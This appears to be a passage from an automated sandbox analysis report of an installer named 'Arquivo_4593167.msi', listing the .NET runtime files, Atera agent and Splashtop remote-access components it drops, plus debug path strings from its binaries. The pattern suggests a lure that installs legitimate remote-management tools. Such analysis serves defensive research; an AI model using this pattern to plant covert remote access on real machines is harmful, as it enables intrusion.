                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Globalization.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Text.Encoding.Extensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.Tools.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.TypeExtensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-time-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.Linq.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-synch-l1-2-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Private.DataContractSerialization.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Handles.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Resources.Reader.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-console-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Compression.Native.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ValueTuple.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Private.Xml.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.NETCore.App.runtimeconfig.jsonJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.Metadata.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-datetime-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Data.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.CSharp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Resources.ResourceManager.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.XmlSerializer.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.NETCore.App.deps.jsonJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Serialization.Primitives.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.Csp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-private-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.OpenSsl.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\mscordaccore_amd64_amd64_6.0.3524.45918.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Text.Json.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.AccessControl.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Quic.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-namedpipe-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Text.Encoding.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\mscordaccore.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.StackTrace.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Principal.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Principal.Windows.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\ucrtbase.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.Encoding.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Linq.Queryable.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Windows.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Overlapped.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Text.Encoding.CodePages.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-filesystem-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\mscorrc.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.DispatchProxy.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Tasks.Extensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ComponentModel.EventBasedAsync.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-processthreads-l1-1-1.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Data.Common.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Compression.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.CompilerServices.VisualC.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.NameResolution.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.ThreadPool.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Thread.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.Emit.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-multibyte-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Collections.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.Win32.Registry.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-file-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Linq.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.Contracts.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Numerics.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.InteropServices.RuntimeInformation.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Collections.Specialized.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-convert-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-processthreads-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.SecureString.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.FileSystem.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.AppContext.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-handle-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-utility-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-process-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Resources.Writer.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-string-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-fibers-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Buffers.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Security.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Compression.Brotli.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.XPath.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.ServicePoint.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.VisualBasic.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Data.DataSetExtensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.X509Certificates.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.Tracing.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Collections.Concurrent.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Drawing.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Http.Json.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.FileVersionInfo.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.Debug.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Timer.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\coreclr.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Loader.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-heap-l1-1-0.dllJump to behavior
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\system32\InstallUtil.InstallLog
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\vista\license.txt
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\vista64\license.txt
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\xp\license.txt
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\xp64\license.txt
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files\dotnet\LICENSE.txt
                                Source: Binary string: System.Threading.Tasks.Dataflow.ni.pdb source: System.Threading.Tasks.Dataflow.dll.1.dr
                                Source: Binary string: Microsoft.CSharp.ni.pdb source: Microsoft.CSharp.dll.1.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encodings.Web\Release\net6.0\System.Text.Encodings.Web.pdb source: System.Text.Encodings.Web.dll0.24.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.FileSystem.Primitives\net6.0-Release\System.IO.FileSystem.Primitives.pdb source: System.IO.FileSystem.Primitives.dll.1.dr
                                Source: Binary string: /_/artifacts/obj/Microsoft.Extensions.FileSystemGlobbing/Release/net6.0/Microsoft.Extensions.FileSystemGlobbing.pdb source: Microsoft.Extensions.FileSystemGlobbing.dll.24.dr
                                Source: Binary string: D:\a\1\s\AlphaControlAgent\obj\Release\AteraAgent.pdb<$ source: AteraAgent.exe, 0000000C.00000000.1754536857.000001C5CB452000.00000002.00000001.01000000.0000000F.sdmp
                                Source: Binary string: c:\slave\workspace\GIT_WIN_Comp_SRUSB\Source_RemoteUSB_VH\src\platform\windows\Release\x64\SRUsb.pdb source: SRUsb.exe.1.dr
                                Source: Binary string: C:\projects\litedb\LiteDB\obj\Release\net4.5\LiteDB.pdb source: LiteDB.dll.24.dr
                                Source: Binary string: D:\a\1\s\Atera.AgentPackage.Common\obj\Release\Atera.AgentPackage.Common.pdb source: AgentPackageAgentInformation.exe, 00000014.00000002.1954998107.000001BE62A42000.00000002.00000001.01000000.00000018.sdmp
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography.Cng\net6.0-windows-Release\System.Security.Cryptography.Cng.pdb source: System.Security.Cryptography.Cng.dll.1.dr
                                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.Compression.ZipFile\4.0.3.0\System.IO.Compression.ZipFile.pdb( source: System.IO.Compression.ZipFile.dll.24.dr
                                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.InteropServices\4.1.2.0\System.Runtime.InteropServices.pdb source: System.Runtime.InteropServices.dll.24.dr
                                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.InteropServices\4.1.2.0\System.Runtime.InteropServices.pdbH5b5 T5_CorDllMainmscoree.dll source: System.Runtime.InteropServices.dll.24.dr
                                Source: Binary string: C:\projects\nlog\src\NLog\obj\Release\net45\NLog.pdb source: NLog.dll.24.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.IsolatedStorage\net6.0-windows-Release\System.IO.IsolatedStorage.pdb source: System.IO.IsolatedStorage.dll.1.dr
                                Source: Binary string: /_/artifacts/obj/System.Diagnostics.EventLog/Release/net6.0-windows/System.Diagnostics.EventLog.pdbSHA256 source: System.Diagnostics.EventLog.dll.24.dr
                                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Process\4.1.2.0\System.Diagnostics.Process.pdb* source: System.Diagnostics.Process.dll.24.dr
                                Source: Binary string: C:\agent\_work\66\s\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: rundll32.exe, 00000003.00000003.1679439512.0000000004815000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000440E000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: c:\svn\branches\features\iris00_v3_20150407_69486\win32\stxpsdrv\src\filters\nup\objfre_win7_x86\i386\xdnup.pdb source: xdnup.dll.1.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Json\net6.0-Release\System.Runtime.Serialization.Json.pdb source: System.Runtime.Serialization.Json.dll.1.dr
                                Source: Binary string: D:\a\1\s\AlphaControlAgent\obj\Release\AteraAgent.pdb source: AteraAgent.exe, 0000000C.00000000.1754536857.000001C5CB452000.00000002.00000001.01000000.0000000F.sdmp
                                Source: Binary string: c:\slave\workspace\GIT_WIN_Comp_SRUSB\Source_RemoteUSB_VH\src\platform\windows\Release\x64\SRUsb.pdbH source: SRUsb.exe.1.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Data.Common\net6.0-Release\System.Data.Common.pdb source: System.Data.Common.dll.1.dr
                                Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: api-ms-win-core-processenvironment-l1-1-0.dll.1.dr
                                Source: Binary string: System.Private.DataContractSerialization.ni.pdb source: System.Private.DataContractSerialization.dll.1.dr
                                Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/net45/ICSharpCode.SharpZipLib.pdbSHA256mW source: AteraAgent.exe, 0000000D.00000002.2284169189.0000020AB9F22000.00000002.00000001.01000000.0000001F.sdmp
                                Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/net45/ICSharpCode.SharpZipLib.pdb source: AteraAgent.exe, 0000000D.00000002.2284169189.0000020AB9F22000.00000002.00000001.01000000.0000001F.sdmp
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Tasks.Dataflow\net6.0-Release\System.Threading.Tasks.Dataflow.pdb source: System.Threading.Tasks.Dataflow.dll.1.dr
                                Source: Binary string: System.Private.CoreLib.ni.pdb source: System.Private.CoreLib.dll.1.dr
                                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA2567 source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2280646482.0000020AB9882000.00000002.00000001.01000000.0000001E.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Process\4.1.2.0\System.Diagnostics.Process.pdb source: System.Diagnostics.Process.dll.24.dr
                                Source: Binary string: C:\projects\nlog\src\NLog\obj\Release\net45\NLog.pdbSHA256d source: NLog.dll.24.dr
                                Source: Binary string: D:\a\1\s\AgentPackageAgentInformation\AgentPackageAgentInformation\obj\Release\AgentPackageAgentInformation.pdb source: AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9BF8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284530443.0000020ABA070000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000000.1924528514.000001BE62232000.00000002.00000001.01000000.00000016.sdmp
                                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\netcoreapp3.1\Microsoft.Win32.TaskScheduler.pdb source: Microsoft.Win32.TaskScheduler.dll0.24.dr
                                Source: Binary string: d:\slave\workspace\GIT_WIN_SRS_Formal\Source\irisserver\Release\SRUnPackFile.pdb source: SplashtopStreamer.exe, 00000024.00000002.2593578356.000000000042E000.00000002.00000001.01000000.0000001B.sdmp, SplashtopStreamer.exe, 00000024.00000000.2186291125.000000000042E000.00000002.00000001.01000000.0000001B.sdmp
                                Source: Binary string: D:\a\1\s\AlphaControlAgentInstallation\obj\Release\AlphaControlAgentInstallation.pdb source: rundll32.exe, 00000003.00000003.1679439512.0000000004815000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000440E000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\netcoreapp3.1\Microsoft.Win32.TaskScheduler.pdbSHA256 source: Microsoft.Win32.TaskScheduler.dll0.24.dr
                                Source: Binary string: System.IO.IsolatedStorage.ni.pdb source: System.IO.IsolatedStorage.dll.1.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.XDocument\net6.0-Release\System.Xml.XDocument.pdbt+ source: System.Xml.XDocument.dll.1.dr
                                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1248000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1955108650.000001BE62AF2000.00000002.00000001.01000000.00000019.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2669791407.00000217326D0000.00000002.00000001.01000000.00000021.sdmp
                                Source: Binary string: d:\slave\workspace\GIT_WIN_SRS_Formal\Source\irisserver\Release\PreVerCheck.pdb source: PreVerCheck.exe, 00000025.00000000.2215637852.0000000000BE3000.00000002.00000001.01000000.0000001C.sdmp, PreVerCheck.exe, 00000025.00000002.2561997635.0000000000BE3000.00000002.00000001.01000000.0000001C.sdmp
                                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.Compression.ZipFile\4.0.3.0\System.IO.Compression.ZipFile.pdb source: System.IO.Compression.ZipFile.dll.24.dr
                                Source: Binary string: C:\projects\litedb\LiteDB\obj\Release\net4.5\LiteDB.pdbSHA256 source: LiteDB.dll.24.dr
                                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2280646482.0000020AB9882000.00000002.00000001.01000000.0000001E.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1248000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1955108650.000001BE62AF2000.00000002.00000001.01000000.00000019.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2669791407.00000217326D0000.00000002.00000001.01000000.00000021.sdmp
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Primitives\net6.0-Release\System.Reflection.Primitives.pdb source: System.Reflection.Primitives.dll.1.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Primitives\net6.0-Release\System.Reflection.Primitives.pdb8+N+ @+_CorDllMainmscoree.dll source: System.Reflection.Primitives.dll.1.dr
                                Source: Binary string: c:\svn\branches\features\iris00_v3_20150407_69486\win32\stxpsdrv\src\filters\nup\objfre_win7_x86\i386\xdnup.pdbh source: xdnup.dll.1.dr
                                Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.1.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x64\Release\System.Private.CoreLib.pdb source: System.Private.CoreLib.dll.1.dr
                                Source: Binary string: C:\agent\_work\66\s\build\ship\x86\wixca.pdb source: Arquivo_4593167.msi
                                Source: Binary string: /_/artifacts/obj/System.Diagnostics.EventLog/Release/net6.0-windows/System.Diagnostics.EventLog.pdb source: System.Diagnostics.EventLog.dll.24.dr
                                Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.1.dr
